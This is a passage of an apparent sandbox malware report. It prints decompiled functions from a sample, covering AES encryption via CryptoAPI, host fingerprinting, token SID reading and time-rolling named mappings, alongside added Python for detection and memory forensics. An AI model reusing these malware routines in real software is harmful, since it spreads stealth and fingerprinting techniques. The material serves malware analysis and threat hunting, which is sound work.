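                hits.append((pid, key[1], pending[key], args.get("pfnAPC")))
        elif api in ("CloseHandle", "TerminateThread"):
            pending.pop((pid, args.get("hObject") or args.get("hThread")), None)
    return hits


if __name__ == "__main__":
    assert country_dword("RU") == 0x5552
    for hit in find_apc_hijacks(TRACE.splitlines()):
        print("APC on alertable-wait thread: pid=%d hThread=%s start=%s apc=%s" % hit)
```

The rule keys on the start routine, not on QueueUserAPC alone: the decoy process 6100 queues an APC to a thread that runs its own code, which is ordinary and is not reported. A real trace source would also need the handle-to-thread mapping to survive duplicated or reused handles, which this toy format ignores.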

Control-flow Graph: rendered in the original report for the basic blocks 0x2021508 to 0x20216af, coloured executed / not executed; not reproduced here.
            C-Code - Quality: 50%
            			E02021508(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
            				int _v8;
            				long* _v12;
            				int _v16;
            				void* _v20;
            				long* _v24;
            				void* _v39;
            				char _v40;
            				void _v56;
            				int _v60;
            				intOrPtr _v64;
            				void _v67;
            				char _v68;
            				void* _t61;
            				int _t68;
            				signed int _t76;
            				int _t79;
            				int _t81;
            				void* _t85;
            				long _t86;
            				int _t90;
            				signed int _t94;
            				int _t101;
            				void* _t102;
            				int _t103;
            				void* _t104;
            				void* _t105;
            				void* _t106;
            
            				_t103 = __eax;
            				_t94 = 6;
            				_v68 = 0;
            				memset( &_v67, 0, _t94 << 2);
            				_t105 = _t104 + 0xc;
            				asm("stosw");
            				asm("stosb");
            				_v40 = 0;
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				asm("stosw");
            				asm("stosb");
            				_t61 =  *0x202a0e8( &_v24, 0, 0, 0x18, 0xf0000000); // executed
            				if(_t61 == 0) {
            					_a8 = GetLastError();
            				} else {
            					_t101 = 0x10;
            					memcpy( &_v56, _a8, _t101);
            					_t106 = _t105 + 0xc;
            					_v60 = _t101;
            					_v67 = 2;
            					_v64 = 0x660e;
            					_v68 = 8;
            					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
            					if(_t68 == 0) {
            						_a8 = GetLastError();
            					} else {
            						_push(0);
            						_push( &_v40);
            						_push(1);
            						_push(_v12);
            						if( *0x202a0e4() == 0) {
            							_a8 = GetLastError();
            						} else {
            							_t18 = _t103 + 0xf; // 0x10
            							_t76 = _t18 & 0xfffffff0;
            							if(_a4 != 0 && _t76 == _t103) {
            								_t76 = _t76 + _t101;
            							}
            							_t102 = E020233DC(_t76);
            							_v20 = _t102;
            							if(_t102 == 0) {
            								_a8 = 8;
            							} else {
            								_v16 = 0;
            								_a8 = 0;
            								while(1) {
            									_t79 = 0x10;
            									_v8 = _t79;
            									if(_t103 <= _t79) {
            										_v8 = _t103;
            									}
            									memcpy(_t102, _a12, _v8);
            									_t81 = _v8;
            									_a12 = _a12 + _t81;
            									_t103 = _t103 - _t81;
            									_t106 = _t106 + 0xc;
            									if(_a4 == 0) {
            										_t85 =  *0x202a0a8(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
            									} else {
            										_t85 =  *0x202a0c0(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
            									}
            									if(_t85 == 0) {
            										break;
            									}
            									_t90 = _v8;
            									_v16 = _v16 + _t90;
            									_t102 = _t102 + _t90;
            									if(_t103 != 0) {
            										continue;
            									} else {
            										L17:
            										 *_a16 = _v20;
            										 *_a20 = _v16;
            									}
            									goto L21;
            								}
            								_t86 = GetLastError();
            								_a8 = _t86;
            								if(_t86 != 0) {
            									E020261DA(_v20);
            								} else {
            									goto L17;
            								}
            							}
            						}
            						L21:
            						CryptDestroyKey(_v12);
            					}
            					CryptReleaseContext(_v24, 0);
            				}
            				return _a8;
            			}

(Per-line address column of the report's side-by-side view, 0x02021511 to 0x020216af; not reproduced here.)

            APIs
            • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,02025088,00000001,02023ECE,00000000), ref: 02021540
            • memcpy.NTDLL(02025088,02023ECE,00000010,?,?,?,02025088,00000001,02023ECE,00000000,?,020266D9,00000000,02023ECE,?,76B5C740), ref: 02021559
            • CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 02021582
            • CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 0202159A
            • memcpy.NTDLL(00000000,76B5C740,02CA9600,00000010), ref: 020215EC
            • CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,02CA9600,00000020,?,?,00000010), ref: 02021615
            • GetLastError.KERNEL32(?,?,00000010), ref: 02021644
            • GetLastError.KERNEL32 ref: 02021676
            • CryptDestroyKey.ADVAPI32(00000000), ref: 02021682
            • GetLastError.KERNEL32 ref: 0202168A
            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 02021697
            • GetLastError.KERNEL32(?,?,?,02025088,00000001,02023ECE,00000000,?,020266D9,00000000,02023ECE,?,76B5C740,02023ECE,00000000,02CA9600), ref: 0202169F
            Strings
Memory Dump Source
• Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
• Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDestroyEncryptImportParamRelease
            • String ID: @MetNet
            • API String ID: 3401600162-2109406137
            • Opcode ID: 06fbfc4ec6294b8387ba7aec2fdb10e57219c8055bea163b9af2e6c9054f0673
            • Instruction ID: 37b3a1793b022d3f4a3b52560f212f080b11523c86a3b9976d64ec44293775ad
            • Opcode Fuzzy Hash: 06fbfc4ec6294b8387ba7aec2fdb10e57219c8055bea163b9af2e6c9054f0673
            • Instruction Fuzzy Hash: 6F516DB1900318FFDB11DFA4DC88AAEBBB9FB08344F154466F919E6141D7758A18EF60
            Uniqueness

            Uniqueness Score: -1.00%
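The API trace above is the CryptoAPI idiom for using a raw symmetric key: CryptAcquireContextW with dwProvType 0x18 (PROV_RSA_AES) and dwFlags 0xF0000000 (CRYPT_VERIFYCONTEXT, an ephemeral context without a key container), a 0x10-byte memcpy into the key blob, CryptImportKey with a 0x1C-byte blob, CryptSetKeyParam with dwParam 1 (KP_IV), then CryptEncrypt over 0x20 bytes. A 0x1C-byte PLAINTEXTKEYBLOB is a 12-byte BLOBHEADER, a 4-byte key length and 16 bytes of key, so the call imports a 128-bit key. The Python below is an added example for carving such a blob out of a memory dump and rebuilding one; it is not code from the page or from the sample. The sample blob is constructed, and its ALG_ID (CALG_AES_128) is an assumption: the trace shows the blob length and the provider type, not the algorithm field.

```python
import struct

# CryptoAPI (wincrypt.h) constants that appear in the API trace.
PROV_RSA_AES = 0x18               # dwProvType in CryptAcquireContextW
CRYPT_VERIFYCONTEXT = 0xF0000000  # dwFlags: ephemeral context, no key container
PLAINTEXTKEYBLOB = 0x8            # BLOBHEADER.bType
CUR_BLOB_VERSION = 0x2            # BLOBHEADER.bVersion
KP_IV = 1                         # dwParam in CryptSetKeyParam

# ALG_ID values a PLAINTEXTKEYBLOB may carry for a symmetric key.
CALG_NAMES = {
    0x6601: "CALG_DES", 0x6602: "CALG_RC2", 0x6603: "CALG_3DES",
    0x6609: "CALG_3DES_112", 0x6801: "CALG_RC4",
    0x660E: "CALG_AES_128", 0x660F: "CALG_AES_192", 0x6610: "CALG_AES_256",
}

# BLOBHEADER: BYTE bType, BYTE bVersion, WORD reserved, ALG_ID aiKeyAlg,
# followed (for PLAINTEXTKEYBLOB) by DWORD keyLen and keyLen raw key bytes.
_HDR = struct.Struct("<BBHI")
_LEN = struct.Struct("<I")


def blob_len_for_key(key_len: int) -> int:
    """Total PLAINTEXTKEYBLOB size for a raw key of key_len bytes."""
    return _HDR.size + _LEN.size + key_len


def key_len_from_blob_len(blob_len: int) -> int:
    """Inverse: the 0x1C passed to CryptImportKey implies a 16-byte key."""
    return blob_len - _HDR.size - _LEN.size


def build_plaintextkeyblob(alg_id: int, key: bytes) -> bytes:
    return (_HDR.pack(PLAINTEXTKEYBLOB, CUR_BLOB_VERSION, 0, alg_id)
            + _LEN.pack(len(key)) + key)


def parse_plaintextkeyblob(blob: bytes) -> dict:
    """Split a carved blob into its header fields and raw key, with bounds checks."""
    if len(blob) < _HDR.size + _LEN.size:
        raise ValueError("blob shorter than BLOBHEADER + keyLen")
    btype, bver, _reserved, alg = _HDR.unpack_from(blob, 0)
    if btype != PLAINTEXTKEYBLOB:
        raise ValueError(f"bType 0x{btype:02x} is not PLAINTEXTKEYBLOB")
    (klen,) = _LEN.unpack_from(blob, _HDR.size)
    start = _HDR.size + _LEN.size
    if len(blob) < start + klen:
        raise ValueError("key material truncated")
    return {
        "version": bver,
        "alg_id": alg,
        "alg": CALG_NAMES.get(alg, f"unknown ALG_ID 0x{alg:04x}"),
        "key": blob[start:start + klen],
    }


def describe_context(prov_type: int, flags: int) -> str:
    """Decode the CryptAcquireContextW arguments seen in the trace."""
    prov = "PROV_RSA_AES" if prov_type == PROV_RSA_AES else f"provider 0x{prov_type:x}"
    ctx = ("CRYPT_VERIFYCONTEXT" if flags & CRYPT_VERIFYCONTEXT == CRYPT_VERIFYCONTEXT
           else f"flags 0x{flags:x}")
    return f"{prov}, {ctx}"


# Constructed sample: a 16-byte key wrapped as AES-128. The ALG_ID is an
# assumption; the trace only shows the 0x1C-byte blob length.
SAMPLE_KEY = bytes(range(0x10, 0x20))
SAMPLE_BLOB = build_plaintextkeyblob(0x660E, SAMPLE_KEY)

if __name__ == "__main__":
    info = parse_plaintextkeyblob(SAMPLE_BLOB)
    print(describe_context(0x18, 0xF0000000))
    print(f"blob {len(SAMPLE_BLOB):#x} bytes -> {info['alg']}, key {info['key'].hex()}")
```

When carving from a dump, search for the 4-byte pattern `08 02 00 00` followed by a plausible ALG_ID; the 16 bytes after the length DWORD are the key, and the IV is whatever buffer CryptSetKeyParam received.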

            Control-flow Graph

            Basic blocks (node: address range, API or call):
            • 235: 2023bd3-2023be7
            • 236: 2023bf1-2023c03, call 20271cd
            • 237: 2023be9-2023bee
            • 240: 2023c57-2023c64
            • 241: 2023c05-2023c15, GetUserNameW
            • 242: 2023c66-2023c7d, GetComputerNameW
            • 243: 2023c17-2023c27, RtlAllocateHeap
            • 244: 2023c29-2023c36, GetUserNameW
            • 245: 2023cbb-2023cdf
            • 246: 2023c7f-2023c90, RtlAllocateHeap
            • 247: 2023c46-2023c55
            • 248: 2023c38-2023c44, call 20256b9
            • 249: 2023c92-2023c9b, GetComputerNameW
            • 251: 2023cac-2023caf
            • 252: 2023c9d-2023ca9, call 20256b9
            Edges: 235->236, 235->237, 236->240, 236->241, 237->236, 240->242, 241->242, 241->243, 242->245, 242->246, 243->242, 243->244, 244->247, 244->248, 246->245, 246->249, 247->242, 248->247, 249->251, 249->252, 251->245, 252->251
            C-Code - Quality: 96%
            			E02023BD3(char __eax, void* __esi) {
            				long _v8;
            				char _v12;
            				signed int _v16;
            				signed int _v20;
            				signed int _v28;
            				long _t34;
            				signed int _t39;
            				long _t50;
            				char _t59;
            				intOrPtr _t61;
            				void* _t62;
            				void* _t64;
            				char _t65;
            				intOrPtr* _t67;
            				void* _t68;
            				void* _t69;
            
            				_t69 = __esi;
            				_t65 = __eax;
            				_v8 = 0;
            				_v12 = __eax;
            				if(__eax == 0) {
            					_t59 =  *0x202a310; // 0xd448b889
            					_v12 = _t59;
            				}
            				_t64 = _t69;
            				E020271CD( &_v12, _t64);
            				if(_t65 != 0) {
            					 *_t69 =  *_t69 ^  *0x202a344 ^ 0x6c7261ae;
            				} else {
            					GetUserNameW(0,  &_v8); // executed
            					_t50 = _v8;
            					if(_t50 != 0) {
            						_t62 = RtlAllocateHeap( *0x202a2d8, 0, _t50 + _t50);
            						if(_t62 != 0) {
            							if(GetUserNameW(_t62,  &_v8) != 0) {
            								_t64 = _t62;
            								 *_t69 =  *_t69 ^ E020256B9(_v8 + _v8, _t64);
            							}
            							HeapFree( *0x202a2d8, 0, _t62);
            						}
            					}
            				}
            				_t61 = __imp__;
            				_v8 = _v8 & 0x00000000;
            				GetComputerNameW(0,  &_v8);
            				_t34 = _v8;
            				if(_t34 != 0) {
            					_t68 = RtlAllocateHeap( *0x202a2d8, 0, _t34 + _t34);
            					if(_t68 != 0) {
            						if(GetComputerNameW(_t68,  &_v8) != 0) {
            							_t64 = _t68;
            							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E020256B9(_v8 + _v8, _t64);
            						}
            						HeapFree( *0x202a2d8, 0, _t68);
            					}
            				}
            				asm("cpuid");
            				_t67 =  &_v28;
            				 *_t67 = 1;
            				 *((intOrPtr*)(_t67 + 4)) = _t61;
            				 *((intOrPtr*)(_t67 + 8)) = 0;
            				 *(_t67 + 0xc) = _t64;
            				_t39 = _v16 ^ _v20 ^ _v28;
            				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
            				return _t39;
            			}

            APIs
            • GetUserNameW.ADVAPI32(00000000,?), ref: 02023C0A
            • RtlAllocateHeap.NTDLL(00000000,?), ref: 02023C21
            • GetUserNameW.ADVAPI32(00000000,?), ref: 02023C2E
            • HeapFree.KERNEL32(00000000,00000000), ref: 02023C4F
            • GetComputerNameW.KERNEL32(00000000,00000000), ref: 02023C76
            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 02023C8A
            • GetComputerNameW.KERNEL32(00000000,00000000), ref: 02023C97
            • HeapFree.KERNEL32(00000000,00000000), ref: 02023CB5
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: HeapName$AllocateComputerFreeUser
            • String ID: Uet
            • API String ID: 3239747167-2766386878
            • Opcode ID: cb27895a565a0bbac2bfe2300e2aaeb8fd757c10cb41e667c1204cc0304dc01c
            • Instruction ID: c90dff4b9df3fac6aad30136a7a15dd21d74ee773d437d387e32214f10f1e754
            • Opcode Fuzzy Hash: cb27895a565a0bbac2bfe2300e2aaeb8fd757c10cb41e667c1204cc0304dc01c
            • Instruction Fuzzy Hash: 45312A71A00309AFD721DFA9CDC1AAEB7F9FB48704F71446AE504D3210DB34EA59AB10
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 38%
            			E0202421F(char _a4, void* _a8) {
            				void* _v8;
            				void* _v12;
            				char _v16;
            				void* _v20;
            				char _v24;
            				char _v28;
            				char _v32;
            				char _v36;
            				char _v40;
            				void* _v44;
            				void** _t33;
            				void* _t40;
            				void* _t43;
            				void** _t44;
            				intOrPtr* _t47;
            				char _t48;
            
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				_v20 = _a4;
            				_t48 = 0;
            				_v16 = 0;
            				_a4 = 0;
            				_v44 = 0x18;
            				_v40 = 0;
            				_v32 = 0;
            				_v36 = 0;
            				_v28 = 0;
            				_v24 = 0;
            				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
            					_t33 =  &_v8;
            					__imp__(_v12, 8, _t33);
            					if(_t33 >= 0) {
            						_t47 = __imp__;
            						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
            						_t44 = E020233DC(_a4);
            						if(_t44 != 0) {
            							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
            							if(_t40 >= 0) {
            								memcpy(_a8,  *_t44, 0x1c);
            								_t48 = 1;
            							}
            							E020261DA(_t44);
            						}
            						NtClose(_v8); // executed
            					}
            					NtClose(_v12);
            				}
            				return _t48;
            			}

            APIs
            • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 02024266
            • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 02024279
            • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 02024295
              • Part of subcall function 020233DC: RtlAllocateHeap.NTDLL(00000000,00000000,020262F6), ref: 020233E8
            • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 020242B2
            • memcpy.NTDLL(?,00000000,0000001C), ref: 020242BF
            • NtClose.NTDLL(?), ref: 020242D1
            • NtClose.NTDLL(00000000), ref: 020242DB
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
            • String ID:
            • API String ID: 2575439697-0
            • Opcode ID: a818463a7ef5e005aee9773dbbf1f69fb8dfdba5b36bfd3b381e23a54e4d9cae
            • Instruction ID: 3f63bcf7d293c266bd52178ceeef4eced7e57f808b40065b7178dba7c1366ac3
            • Opcode Fuzzy Hash: a818463a7ef5e005aee9773dbbf1f69fb8dfdba5b36bfd3b381e23a54e4d9cae
            • Instruction Fuzzy Hash: 8C2114B2A0022CBFDB119FA5CC84ADEBFBDFF08750F214022F905A6150D7759B589BA0
            Uniqueness

            Uniqueness Score: -1.00%
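E0202421F opens the target process with PROCESS_QUERY_INFORMATION (0x400), opens its token with TOKEN_QUERY (8), calls NtQueryInformationToken with TokenInformationClass 1 (TokenUser) twice, first with a NULL buffer to learn the size and then with a heap buffer of that size, and finally copies 0x1C bytes from the address stored at the start of that buffer, i.e. from TOKEN_USER.User.Sid. 0x1C (28) bytes is exactly a SID with five sub-authorities (an 8-byte header plus 5 x 4), the layout of S-1-5-21-<machine or domain ids>-<RID> account SIDs. The Python below is an added example, not code from the page or the sample, for decoding such a 28-byte SID from a dump and rebuilding one; the sample SID it uses is constructed.

```python
import struct

SID_REVISION = 1
SID_MAX_SUB_AUTHORITIES = 15


def sid_size(sub_authority_count: int) -> int:
    """Byte length of a SID: Revision, SubAuthorityCount, a 6-byte
    IdentifierAuthority, then one little-endian DWORD per sub-authority."""
    return 8 + 4 * sub_authority_count


def parse_sid(data: bytes) -> str:
    """Binary SID (as copied by the memcpy above) to its S-R-I-S... string form."""
    if len(data) < 8:
        raise ValueError("SID shorter than its 8-byte header")
    revision, count = data[0], data[1]
    if revision != SID_REVISION:
        raise ValueError(f"unsupported SID revision {revision}")
    if count > SID_MAX_SUB_AUTHORITIES:
        raise ValueError(f"sub-authority count {count} exceeds 15")
    if len(data) < sid_size(count):
        raise ValueError("SID truncated")
    authority = int.from_bytes(data[2:8], "big")        # 48-bit, big-endian
    subs = struct.unpack_from(f"<{count}I", data, 8)    # DWORDs, little-endian
    return "-".join(["S", str(revision), str(authority), *map(str, subs)])


def build_sid(text: str) -> bytes:
    """Inverse of parse_sid, e.g. to recreate the 0x1C bytes for a known account."""
    parts = text.split("-")
    if len(parts) < 3 or parts[0] != "S":
        raise ValueError("not a SID string")
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    if len(subs) > SID_MAX_SUB_AUTHORITIES:
        raise ValueError("too many sub-authorities")
    return (bytes([revision, len(subs)]) + authority.to_bytes(6, "big")
            + struct.pack(f"<{len(subs)}I", *subs))


def is_account_sid(text: str) -> bool:
    """S-1-5-21-<3 ids>-<RID>: five sub-authorities, which is the 28-byte case."""
    parts = text.split("-")
    return len(parts) == 8 and parts[:4] == ["S", "1", "5", "21"]


def rid(text: str) -> int:
    """Relative identifier: the last sub-authority."""
    return int(text.rsplit("-", 1)[1])


# Constructed sample account SID; the three machine identifiers are made up.
SAMPLE_SID_TEXT = "S-1-5-21-1004418140-1177238915-682003330-1001"
SAMPLE_SID = build_sid(SAMPLE_SID_TEXT)

if __name__ == "__main__":
    print(f"{len(SAMPLE_SID):#x} bytes: {SAMPLE_SID.hex(' ')}")
    print(parse_sid(SAMPLE_SID), "RID", rid(SAMPLE_SID_TEXT))
```

A SID of another shape (for example the 12-byte S-1-5-18 of LOCAL SYSTEM) is shorter than 0x1C, so the fixed-size copy in the decompiled function reads past it; the parser above only consumes the bytes the header announces.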

            Control-flow Graph

            Basic blocks (node: address range, API):
            • 369: 4015b0-401607, GetSystemTimeAsFileTime
            • 372: 401609
            • 373: 40160e-401627, CreateFileMappingW
            • 374: 401671-401677, GetLastError
            • 375: 401629-401632
            • 376: 401642-401650, MapViewOfFile
            • 377: 401634-40163b, GetLastError
            • 378: 401679-40167f
            • 379: 40163d-401640
            • 380: 401660-401666, GetLastError
            • 381: 401652-40165e
            • 382: 401668-40166f, CloseHandle
            Edges: 369->372, 369->373, 372->373, 373->374, 373->375, 374->378, 375->376, 375->377, 376->380, 376->381, 377->376, 377->379, 379->382, 380->378, 380->382, 381->378, 382->378
            C-Code - Quality: 69%
            			E004015B0(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
            				intOrPtr _v12;
            				struct _FILETIME* _v16;
            				short _v60;
            				struct _FILETIME* _t14;
            				intOrPtr _t15;
            				long _t18;
            				void* _t19;
            				void* _t22;
            				intOrPtr _t31;
            				long _t32;
            				void* _t34;
            
            				_t31 = __edx;
            				_t14 =  &_v16;
            				GetSystemTimeAsFileTime(_t14);
            				_push(0x192);
            				_push(0x54d38000);
            				_push(_v12);
            				_push(_v16);
            				L00402026();
            				_push(_t14);
            				_v16 = _t14;
            				_t15 =  *0x404184;
            				_push(_t15 + 0x4051ca);
            				_push(_t15 + 0x4051c0);
            				_push(0x16);
            				_push( &_v60);
            				_v12 = _t31;
            				L00402020();
            				_t18 = _a4;
            				if(_t18 == 0) {
            					_t18 = 0x1000;
            				}
            				_t19 = CreateFileMappingW(0xffffffff, 0x404188, 4, 0, _t18,  &_v60); // executed
            				_t34 = _t19;
            				if(_t34 == 0) {
            					_t32 = GetLastError();
            				} else {
            					if(_a4 != 0 || GetLastError() == 0xb7) {
            						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
            						if(_t22 == 0) {
            							_t32 = GetLastError();
            							if(_t32 != 0) {
            								goto L9;
            							}
            						} else {
            							 *_a8 = _t34;
            							 *_a12 = _t22;
            							_t32 = 0;
            						}
            					} else {
            						_t32 = 2;
            						L9:
            						CloseHandle(_t34);
            					}
            				}
            				return _t32;
            			}

            APIs
            • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,00401418,0000000A,?,?), ref: 004015BD
            • CreateFileMappingW.KERNELBASE(000000FF,00404188,00000004,00000000,?,?), ref: 0040161D
            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401634
            • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00401648
            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401660
            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A), ref: 00401669
            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401671
            Memory Dump Source
            • Source File: 00000000.00000002.513286183.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.513286183.0000000000403000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.513286183.0000000000405000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.513286183.0000000000407000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Server.jbxd
            Similarity
            • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView
            • String ID:
            • API String ID: 3812556954-0
            • Opcode ID: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
            • Instruction ID: e8584db34bd0864965919452e9e7a980232bfbaa31af8ac4f809374209f4ae08
            • Opcode Fuzzy Hash: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
            • Instruction Fuzzy Hash: 1421C8B2500208BFD7119FA4DC84EAF3BACEB44355F14443AFA05F72E0D6758D458B68
            Uniqueness

            Uniqueness Score: -1.00%
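E004015B0 reads the current time with GetSystemTimeAsFileTime, pushes the 64-bit FILETIME together with the 64-bit constant 0x0000019254D38000 (the two pushes 0x54d38000 and 0x192) for the CRT helper at L00402026, stores the 64-bit result back into _v16/_v12, and formats it through L00402020 into a 0x16-element buffer of 16-bit characters (_v60) that becomes the lpName argument of CreateFileMappingW (PAGE_READWRITE = 4, default size 0x1000). When the caller passes a size of zero the mapping is only kept if CreateFileMappingW reported ERROR_ALREADY_EXISTS (0xB7); otherwise the handle is closed and 2 is returned, so size zero means "attach to an existing mapping", non-zero means "create it". The constant is 1,728,000,000,000 ticks of 100 ns, exactly 48 hours, so reading the helper as unsigned 64-bit division (the page does not resolve the helper; a multiplication by that constant would overflow 64 bits and carry no meaning) gives a counter that changes every two days and, through it, a mapping name that is stable for 48 hours and then rolls over. The Python below is an added example that decodes the constant and computes that counter; the format string itself is not on the page, so the example stops at the integer. It is not code from the page or the sample.

```python
from datetime import datetime, timedelta, timezone

# The two DWORDs pushed for the 64-bit helper in E004015B0.
PERIOD_HI, PERIOD_LO = 0x192, 0x54D38000
PERIOD_TICKS = (PERIOD_HI << 32) | PERIOD_LO    # 1_728_000_000_000 ticks

TICKS_PER_SECOND = 10_000_000                    # FILETIME counts 100 ns intervals
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
MAX_FILETIME = (1 << 64) - 1


def utc(year, month, day, hour=0, minute=0, second=0):
    """Convenience constructor for aware UTC timestamps."""
    return datetime(year, month, day, hour, minute, second, tzinfo=timezone.utc)


def filetime_from_datetime(dt):
    if dt.tzinfo is None:
        raise ValueError("need an aware datetime")
    # timedelta // timedelta yields an exact integer count of microseconds.
    return ((dt - FILETIME_EPOCH) // timedelta(microseconds=1)) * 10


def datetime_from_filetime(ft):
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def period_seconds():
    """172_800 s: the constant is exactly 48 hours of FILETIME ticks."""
    return PERIOD_TICKS // TICKS_PER_SECOND


def epoch_index(ft):
    """Unsigned 64-bit FILETIME // PERIOD_TICKS, the value that changes every 48 h
    (reading the unnamed helper as a division is an assumption, see above)."""
    if not 0 <= ft <= MAX_FILETIME:
        raise ValueError("FILETIME out of range")
    return ft // PERIOD_TICKS


def window_for(index):
    """UTC start and end of the 48-hour window a given counter value covers."""
    start = datetime_from_filetime(index * PERIOD_TICKS)
    return start, start + timedelta(seconds=period_seconds())


def same_window(dt_a, dt_b):
    """True if two timestamps would produce the same counter, hence the same name."""
    return epoch_index(filetime_from_datetime(dt_a)) == epoch_index(filetime_from_datetime(dt_b))


if __name__ == "__main__":
    now = datetime.now(timezone.utc)
    idx = epoch_index(filetime_from_datetime(now))
    start, end = window_for(idx)
    print(f"period {period_seconds()} s, counter {idx}, "
          f"valid {start:%Y-%m-%d %H:%M} to {end:%Y-%m-%d %H:%M} UTC")
```

For hunting, this means a name derived from the counter is only comparable across hosts whose clocks fall in the same 48-hour window; a detection keyed on the literal name has to be regenerated every two days.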

            C-Code - Quality: 72%
            			E0040110B(intOrPtr* __eax, void** _a4) {
            				int _v12;
            				void* _v16;
            				void* _v20;
            				void* _v24;
            				int _v28;
            				int _v32;
            				intOrPtr _v36;
            				int _v40;
            				int _v44;
            				void* _v48;
            				void* __esi;
            				long _t34;
            				void* _t39;
            				void* _t47;
            				intOrPtr* _t48;
            
            				_t48 = __eax;
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				_v24 =  *((intOrPtr*)(__eax + 4));
            				_v16 = 0;
            				_v12 = 0;
            				_v48 = 0x18;
            				_v44 = 0;
            				_v36 = 0x40;
            				_v40 = 0;
            				_v32 = 0;
            				_v28 = 0;
            				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
            				if(_t34 < 0) {
            					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
            				} else {
            					 *_t48 = _v16;
            					_t39 = E00401459(_t48,  &_v12); // executed
            					_t47 = _t39;
            					if(_t47 != 0) {
            						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
            					} else {
            						memset(_v12, 0, _v24);
            						 *_a4 = _v12;
            					}
            				}
            				return _t47;
            			}

            APIs
            • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74654EE0,00000000,00000000,?), ref: 00401168
